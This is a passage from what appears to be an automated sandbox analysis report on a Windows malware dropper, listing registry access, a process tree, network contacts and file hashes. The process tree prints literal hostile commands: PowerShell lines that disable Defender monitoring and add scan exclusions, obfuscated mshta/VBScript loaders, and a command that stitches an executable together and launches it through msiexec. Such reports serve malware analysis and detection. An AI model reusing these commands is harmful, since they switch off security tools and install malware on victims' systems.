| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe"
C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp" /SL5="$8019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp" /SL5="$9019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 488
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| N/A | 127.0.0.1:49279 | tcp | |
| N/A | 127.0.0.1:49281 | tcp | |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 72.84.118.132:8080 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 06c46fe375c6748c533c881346b684d1 |
| SHA1 | cb488c5b5f58f3adaf360b0721e145f59c110b57 |
| SHA256 | 07cf30eb7de3a5626ce499d5efdeba147c3c5bd40686cfc8727b4da7f9ab7d1a |
| SHA512 | bdf582b78bc5ef135260f7c93119ef315cc08836d9864014951bc6fe919e33ca3184828c70e6ab43b70730bd191a511112a088968abf03bbe4a5e17cb4276443 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
| MD5 | ba794724c566766d57e2aee175cde54a |
| SHA1 | 401fb41eaf42791c66738f460009ba00f7cdd913 |
| SHA256 | 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6 |
| SHA512 | 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774 |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2744-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2744-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2744-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-88-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2744-87-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2744-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-81-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2744-80-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe
| MD5 | 83552f70e7791687013e0b6e77eef7f4 |
| SHA1 | ae6e0e3f2873dd234b4813d4c6a47364111dec8a |
| SHA256 | 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84 |
| SHA512 | 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9 |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
memory/1436-132-0x0000000000910000-0x0000000000918000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
memory/1556-165-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6V5UUU7WNQG6VILYJXP7.temp
| MD5 | d4c7a2d0382dfe7fb6c61673ddeef4b2 |
| SHA1 | 8cb66d10121b3d55d4133de3260b11eae33d8756 |
| SHA256 | 57404e06d681c79786d4904f34a4d8f7c1f771e3e68719686fa0a61d96fbb4fb |
| SHA512 | 23481a22eb082011906c1a574bee153fd3b32fd046af268d91431494e6d022b2400da4a55288f6e667cdba94c471614f38d360c1aab8f15f8a656607c2d8f926 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
